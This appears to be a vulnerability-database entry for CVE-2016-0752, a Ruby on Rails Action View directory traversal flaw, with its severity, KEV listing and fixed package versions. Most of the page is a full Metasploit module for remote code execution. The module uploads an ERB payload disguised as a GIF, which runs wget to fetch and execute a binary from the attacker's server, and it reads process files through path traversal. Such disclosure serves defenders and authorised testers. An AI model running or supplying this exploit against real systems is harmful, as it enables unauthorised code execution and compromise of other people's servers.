CVE-2016-0752

unknown KEV

Published 2016-01-25 · Modified 2022-03-25

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Directory traversal vulnerability in Action View in Ruby on Rails allows remote attackers to read arbitrary files.

CISA KEV

Vendor: Rails
Product: Ruby on Rails
Due date: 2022-04-15

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-40561 remote multiple verified ruby · 7 KB

Metasploit · 2016-10-17

Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)

ruby exploit Source: Exploit-DB

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the explicit render
        method when leveraging user parameters.
        This module has been tested across multiple versions of Ruby on Rails.
        The technique used by this module requires the specified
        endpoint to be using dynamic render paths, such as the following example:

        def show
          render params[:id]
        end

        Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
        can literally be any endpoint. This module doesnt use the log inclusion method of
        exploitation due to it not being universal enough. Instead, a new code injection
        technique was found and used whereby an attacker can upload temporary image files
        against any POST endpoint and use them for the inclusion attack. Finally, you only
        get one shot at this if you are testing with the builtin rails server, use caution.
      },
      'Author'         =>
        [
          'mr_me <mr_me@offensive-security.com>',      # necromanced old bug & discovered new vector rce vector
          'John Poulin (forced-request)'               # original render bug finder
        ],
      'References'  =>
        [
          [ 'CVE', '2016-0752'],
          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # rails patch
          [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'],  # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's original exploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'    => ['linux', 'bsd'],
      'Arch'        => ARCH_X86,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Privileged'     => false,
      'Targets'     =>
        [
          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ]                                                   # Other versions are also affected
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 16 2016'))
    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
      ], self.class)
  end

  def check

    # this is the check for the dev environment
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2f"),
      'method'    =>  'GET',
    }, 60)

    # if the page controller is dynamically rendering, its for sure vuln
    if res and res.body =~ /render params/
      return CheckCode::Vulnerable
    end

    # this is the check for the prod environment
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
      'method'    =>  'GET',
    }, 60)

    # if we can read files, its likley we can execute code
    if res and res.body =~ /ruby/
      return CheckCode::Appears
    end
    return CheckCode::Safe
  end

  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def send_payload
    @bd = rand_text_alpha(8+rand(8))
    fn  = rand_text_alpha(8+rand(8))
    un  = rand_text_alpha(8+rand(8))
    pn  = rand_text_alpha(8+rand(8))
    register_file_for_cleanup("/tmp/#{@bd}")
    cmd  = "wget #{@service_url} -O /tmp/#{@bd};"
    cmd << "chmod 755 /tmp/#{@bd};"
    cmd << "/tmp/#{@bd}"
    pay = "<%=`#{cmd}`%>"
    print_status("uploading image...")
    data = Rex::MIME::Message.new
    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => @cookie,
      'uri'    => normalize_uri(datastore['URIPATH'], pn),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })
    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
      return true
    else

      # this is where we pull the log file
      if leak_log
        return true
      end
    end
    return false
  end

  def leak_log

    # path to the log /proc/self/fd/7
    # this bypasses the extension check
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
      'method'    =>  'GET',
    }, 60)

    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      return true
    end
    return false
  end

  def start_http_server
    @pl = generate_payload_exe
    @elf_sent = false
    downfile = rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    # do not use SSL for the attacking web server
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
    service_url_payload = srv_host + resource_uri
    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})
    datastore['SSL'] = true if ssl_restore
    connect
  end

  def render_tmpfile
    @path.gsub!(/\//, '%2f')
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], @path),
      'method'    =>  'GET',
    }, 1)
  end

  def exploit
      print_status("Sending initial request to detect exploitability")
      start_http_server
      if send_payload
        print_good("injected payload")
        render_tmpfile

        # we need to delay, for the stager
        select(nil, nil, nil, 5)
      end
  end
end

Metasploit modules

exploit_multi/http/rails_dynamic_render_code_exec rank 600

Ruby on Rails Dynamic Render File Upload Remote Code Execution

Source fetch failed: fetch_error — view the original via the link above.

OS impact

SUSE Affected 1 release

Version	Status	Fixed in
—	Affected	—

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2:4.2.5.1-1`
sid	Fixed	`2:4.2.5.1-1`
forky	Fixed	`2:4.2.5.1-1`
bullseye	Fixed	`2:4.2.5.1-1`
bookworm	Fixed	`2:4.2.5.1-1`

Package impact

Ecosystem	Package	Vulnerable	Fixed
RubyGems	actionview	`<>= 5.0.0.beta1.1`	`>= 5.0.0.beta1.1`
RubyGems	actionpack	`!>= 4.1.0\|\|<>= 5.0.0.beta1.1`	`>= 5.0.0.beta1.1`
RubyGems	actionview	`>=4.0.0,<4.1.14.1`	`4.1.14.1`
RubyGems	actionview	`>=4.2.0,<4.2.5.1`	`4.2.5.1`
RubyGems	actionpack	`>=4.0.0,<4.1.14.1`	`4.1.14.1`
RubyGems	actionpack	`>=4.2.0,<4.2.5.1`	`4.2.5.1`
RubyGems	actionpack	`<3.2.22.1`	`3.2.22.1`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.